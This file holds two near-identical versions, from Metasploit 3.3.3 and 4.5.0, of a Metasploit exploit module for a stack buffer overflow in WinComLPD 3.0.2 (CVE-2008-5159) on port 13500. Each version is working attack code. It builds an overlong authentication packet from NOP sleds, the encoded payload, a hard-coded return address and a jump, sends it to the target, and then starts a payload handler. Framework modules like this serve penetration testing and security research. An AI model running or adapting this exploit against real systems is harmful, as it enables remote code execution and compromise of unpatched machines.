==> metasploit-3.3.3.tbz: share/metasploit/modules/exploits/windows/lpd/wincomlpd_admin.rb <==
##
# $Id: wincomlpd_admin.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WinComLPD <= 3.0.2 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in WinComLPD <= 3.0.2.
					By sending an overly long authentication packet to the remote
					adminstration service, an attacker may be able to execute arbitrary
					code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 7724 $',
			'References'     => 
				[ 
					['CVE', '2008-5159'],
					['OSVDB', '42861'],
					['BID', '27614'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,	
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinComLPD 3.0.2.623',   { 'Ret' => 0x0047d7a7 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Feb 4 2008',
			'DefaultTarget'  => 0))

			register_options([Opt::RPORT(13500)], self)
	end

	def exploit
		connect

		# 'net start lpdservice' after you migrate!
		sploit =  "\x65\x00\x00\x00\x00\x00\x00\x04\x00\x00\xFF\x1F"
		sploit << make_nops(872 - payload.encoded.length)
		sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
		sploit << make_nops(2) + [target.ret].pack('V') + make_nops(8)
		sploit << [0xe8, -550].pack('CV') + rand_text_alpha(rand(324) + 1)

		print_status("Trying target #{target.name}...")
		
		sock.puts(sploit)
		sleep(5)

		handler
		disconnect
	end
end

==> metasploit-4.5.0.tbz: share/metasploit/modules/exploits/windows/lpd/wincomlpd_admin.rb <==
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WinComLPD <= 3.0.2 Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in WinComLPD <= 3.0.2.
				By sending an overly long authentication packet to the remote
				adminstration service, an attacker may be able to execute arbitrary
				code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2008-5159'],
					['OSVDB', '42861'],
					['BID', '27614'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x0a",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinComLPD 3.0.2.623',   { 'Ret' => 0x0047d7a7 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Feb 4 2008',
			'DefaultTarget'  => 0))

		register_options([Opt::RPORT(13500)], self)
	end

	def exploit
		connect

		# 'net start lpdservice' after you migrate!
		sploit =  "\x65\x00\x00\x00\x00\x00\x00\x04\x00\x00\xFF\x1F"
		sploit << make_nops(872 - payload.encoded.length)
		sploit << payload.encoded + Rex::Arch::X86.jmp_short(6)
		sploit << make_nops(2) + [target.ret].pack('V') + make_nops(8)
		sploit << [0xe8, -550].pack('CV') + rand_text_alpha(rand(324) + 1)

		print_status("Trying target #{target.name}...")

		sock.puts(sploit)
		select(nil,nil,nil,5)

		handler
		disconnect
	end
end
